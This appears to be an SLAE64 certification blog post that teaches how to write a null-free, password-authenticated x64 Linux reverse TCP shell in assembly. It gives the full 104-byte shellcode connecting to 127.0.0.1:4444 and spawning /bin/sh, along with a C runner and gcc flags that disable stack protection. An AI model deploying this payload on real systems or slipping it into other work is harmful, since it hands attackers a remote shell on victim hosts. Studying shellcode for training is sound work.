The objective here is to create a reverse TCP bind shell using assembly x64, which will authenticate the attacker through a password, and have no Null bytes (0x00) in it.

So, where to start? Much like the previous post, by basing our code on the C equivalent source code. Here is what a reverse tcp shell looks like in C:

fig1
Figure 1 – reverse shell in C

I will try not to repeat myself on this post, since I’ve layed out the basic rules, and the reasoning behind not having error checks on the TCP bind shell explanation.

One of the differences on this post, from the previous bind shell, is that I realised yet another improvement one can make on your shellcode. This actually reduced a previous draft of this shellcode from 110 bytes to 104 (oh, the smile on my face). Bare in mind that this has been a learning process and, even though I could rewrite the previous post’s bind shell to make it smaller, I decided to be honest about the learning itself, and leave it as it is.

Notice that the way I’ve been learning about techniques, to reduce shellcode byte size, is by going through as many as I can (mostly the shortests I can find) while consulting Intel’s manual to understand what some rarely seen instructions do and check on their byte size (if I’m not compiling and objdump’ing them to be sure). And, while I have seen some very very short shellcode, I’ve noticed that to do so, sometimes, they sacrifice on their being robust, which is something I’m not willing to do.

Now, the improvement I’ve mentioned is that many shellcodes were doing the following:

push rsp

pop rdi

instead of:

mov rdi, rsp

This was confusing to me, because I was used to think, at this point, that the push was 2 bytes long, the pop was 1, and those are the same 3 bytes of length that the mov has. BUT the push is actually 2 bytes long only when you’re pushing an immediate value (like push 10). If you’re pushing a register it’s only one byte. Fantastic! I immediately recalled several instances where I was doing this “mov r64,r64” (a lot on the execve section for sure), which means I can save another byte for every single such instruction.

You should realise, by the end of analysing my final code, that I don’t always use the shortest options when it comes to these byte size reduction techniques. This is because of robustness. For example, I won’t use a 2 byte long “mov al,41” for a socket syscall, if I’m not absolutely positive that the 7 upper bytes from RAX register are zeros. “push 41” and “pop rax” guarantees just that, which means there are some places where I’ll definitely use the longer option. Specifically, after syscalls that will “pollute” those upper bytes on RAX because of their return value.

So let’s start by creating the socket [Figure 1 – line 23].

Again, I won’t explain how to make a syscall, where to get the syscall RAX register values, and how to know which constant value to use when you see AF_INET and SOCK_STREAM on the C code, since I already did.

So, the socket creation is pretty much the same as the TCP bind shell and comes down to:

fig9
Figure 2 – socket syscall

Now we need to build up the socket structure with the information on the IP and TCP port to connect back to, and perform the connect itself:

fig3
Figure 3 – socket structure and connect syscall

The RAX register contains the socket returned by the socket syscall and, because we want to send it as the first parameter to the bind syscall, we start by moving it to RDI.

Now, regarding the apparently random value that I move into RBX, this is how I came to it:

  1. I compiled the code using an easy to read (and successfully tested) set of instructions (no care at all about null bytes), which will have as IP, the value 127.0.0.1 (localhost), and as the TCP port, the value 4444, which is 0x115c in hex and, because of the architecture being little endian, it actually becomes 0x5c11 (byte order reversal). The IP address is also reversed:

    fig4
    Figure 4
  2. I used GDB, and break pointed into the instruction right next to the last one (sub rsp,8), and checked how the stack (RSP) was set. The structure is exactly 16 bytes long. Now the point of this exercise is to basically replace all the figure 4’s instructions for 2 push instructions, and that’s why I’m checking on its layout:

    fig11
    Figure 5 – stack layout
  3. Then, after push’ing the zeroed out RDX (the top eight zeros – “top” in terms of addressing, but actually on the bottom of fig 5), I took on the value that is layed out: 02 00 11 5c 7f 00 00 01; reversed it (little endian): 01 00 00 7f 5c 11 00 02; and, because of all the null bytes that this would have if I just moved it into a register, I had to flip every single bit into: fe ff ff 80 a3 ee ff fd Notice that I can only do this because there were no 0xff bytes in there, otherwise I’d still end up with a null byte on this one.
  4. Execute the instruction not rbx , after moving the previous value into RBX, to reverse the bit flipping.

 

And now we move on to redirecting the local application’s stdin and stdout file descriptors into the socket associated with the IP and port we just connected to:

fig12.png
Figure 6

This code has also been explained in the TCP bind shell post.

Now, the authentication code.

fig7.png
Figure 7 – authentication section

The only change here from the TCP bind shell is the improvement I mentioned of replacing the mov r64,r64 to a push r64 and pop r64. This same improvement was made on the execve syscall itself:

fig8.png
Figure 8 – execve code

And it’s done!

We now compile the code:

nasm -f elf64 RevShell.nasm -o RevShell.o && ld RevShell.o -o RevShell

To try the shellcode, we extract the opcode in hexadecimal format using some command line nijutsu:

for i in `objdump -d RevShell | tr ‘\t’ ‘ ‘ | tr ‘ ‘ ‘\n’ | egrep ‘^[0-9a-f]{2}$’ ` ; do echo -n “\x$i” ; done

The output will be placed inside the following array in C code:

#include<stdio.h>
#include<string.h>
unsigned char code[] = \
“\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x48\x97\x52\x48\xbb\xfd\xff\xee\xa3\x80\xff\xff\xfe\x48\xf7\xd3\x53\x54\x5e\xb0\x2a\xb2\x10\x0f\x05\x6a\x03\x5e\xb0\x21\xff\xce\x0f\x05\xe0\xf8\x48\x31\xff\x50\x54\x5e\xb2\x08\x0f\x05\x48\x91\x48\xbb\x31\x32\x33\x34\x35\x36\x37\x0a\x53\x54\x5f\xf3\xa6\x75\x1a\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x54\x5a\x57\x54\x5e\x0f\x05\x90”;
main()
{
printf(“Shellcode Length:  %d\n”, (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

Which will then be compiled with:

gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

And execute it:

fig9
Figure 9 – shellcode execution (104 bytes long)
fig10
Figure 10 – Attacker listening to port 4444 and getting the connection from the shellcode

 

You can find all the files on my gitlab account.

On a personal note, just want to give a huge thanks to Vivek Ramachandran and the Pentester Academy team, as I have enjoyed every second of this course since I’ve learned so many interesting things. Thank you!

 


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: PA-2109